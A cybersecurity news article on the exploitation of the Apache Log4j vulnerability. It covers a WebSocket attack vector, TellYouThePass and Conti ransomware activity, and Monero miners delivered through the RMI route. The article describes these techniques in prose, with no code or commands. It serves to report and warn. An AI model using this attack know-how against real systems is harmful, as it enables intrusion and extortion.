Apache Log4j: New Attack Vectors, Ransomware SeenExploits Range From Injecting Monero Miners to Ransomware Activities
Cybersecurity experts continue to warn that nation-state attackers appear to be abusing or testing the Log4j vulnerability, while criminal groups are also targeting the flaw to drop malicious code - from ransomware to cryptomining software - and access brokers are reportedly harvesting credentials for sale to other cybercriminals (see: Nation-State Attackers Wielding Log4j Against Targets).
In an emergency directive issued on Friday regarding the Apache Log4j vulnerabilities, the U.S. Cybersecurity and Infrastructure Security Agency has required federal civilian departments and agencies to immediately patch their systems or implement appropriate mitigation measures. CISA previously gave agencies until Friday to patch against Log4j exploits via its Known Exploited Vulnerabilities Catalog.
WebSockets is a computer communications protocol that provides full-duplex communication channels over a single TCP connection, making it possible to open a two-way interactive communication session between the user's browser and a server. They are commonly used for applications such as chat and alerts on websites.
"We understood that the impact of Log4j was limited to vulnerable servers. This newly discovered attack vector means that anyone with a vulnerable Log4j version on their machine or local private network can browse a website and potentially trigger the vulnerability," says Matthew Warner, chief technology officer at Blumira.
Researchers have not yet found proof of active exploitation but say that the vector significantly expands the attack surface and "can impact services even running as localhost which were not exposed to any network."
"The client itself generally has no direct control over these WebSocket connections, which can silently initiate when a webpage loads. WebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack," Warner says.
Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and until recently inactive ransomware family, mainly affecting Chinese victims, according to Curated Intelligence.
"Research has been published in the Chinese-speaking community, but not in the English-speaking community until now. Judging from threat reports, this threat appears to be predominantly affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service)," researchers at Curated Intelligence say.
KnownSec 404 Team's Heige first reported about the ransomware activity. But in a now-deleted tweet from Heige, the Curated Intelligence team says that the ransomware was deployed on an old system that contained an internet-facing Log4j2 RCE vulnerability, with multiple responses containing references to TellYouThePass.
In addition to Heige's tweet, other researchers indicated that the ransomware family could be TellYouThePass. A Curated Intel member named @PolarToffee says, "On IDR, we've see a very sudden spike in submissions for what is a very old ransomware (TellYouThePass) today. Not saying they are using Log4j2 but that's certainly interesting."
According to research published in the Chinese-speaking community, Sangfor Threat Intelligence found that various attack groups have used this vulnerability to launch blackmail attacks.
"On December 13, Sangfor's terminal security team and Anfu's emergency response center jointly monitored a ransomware called Tellyouthepass, which has attacked both platforms. Sangfor has captured a large number of Tellyouthepass ransomware interception logs," according to the Sangfor Threat Intelligence team. "It is worth noting that this is not the first time that Tellyouthepass ransomware has used high-risk vulnerabilities to launch attacks."
Sangfor researchers also say that last year, the attackers used Eternal Blue vulnerabilities to attack multiple organizational units.
Use of Monero Miners
Juniper Threat Labs says that most of attackers who were earlier using the Lightweight Directory Access Protocol - or LDAP - JNDI vector to inject code in the victim’s server are now shifting towards using the Remote Method Invocation - or RMI - API.
"RMI is a mechanism that allows an object residing in one Java Virtual Machine (JVM) to access or invoke an object running on another JVM. To facilitate this interaction, the local JVM may require Java bytecode related to the remote object. This code is downloaded from a specified remote URL and loaded into the local JVM," according to Juniper researchers Alex Burt and Asher Langton.
The researchers say that RMI operations are subject to additional checks and constraints by a Java security manager, but that it has been proven previously that some JVM versions do not apply the same restrictions and policies to JNDI.
During further analysis, the researchers found that an obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. "Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x84_64 Linux targets. The full script also adds persistence via the cron subsystem," researchers say.
Conti Group Activity
Threat intelligence firm Advanced Intelligence says that it has found the Conti ransomware group using the critical Log4Shell exploit to gain unauthorized access into VMware vCenter Server instances.
"Divided on several teams and involving tenths of full-time members, the Russian-speaking Conti made over $150 million in the last six months," according to AdvIntel research.
Conti is one of several Russian-speaking ransomware operations - believed to be operating from countries that were formerly part of the Soviet Union - that have continued to hit targets in the U.S. and Europe, causing widespread disruption.
During analysis, the threat intelligence firm found that multiple Conti group members had expressed interest in exploitation of the vulnerability for the initial attack vector resulting in the scanning activity leveraging the publicly available Log4J2 exploit.
"The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J2 exploit. Most importantly, AdvIntel confirmed that the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network, resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions," the Advanced Intelligence researchers say.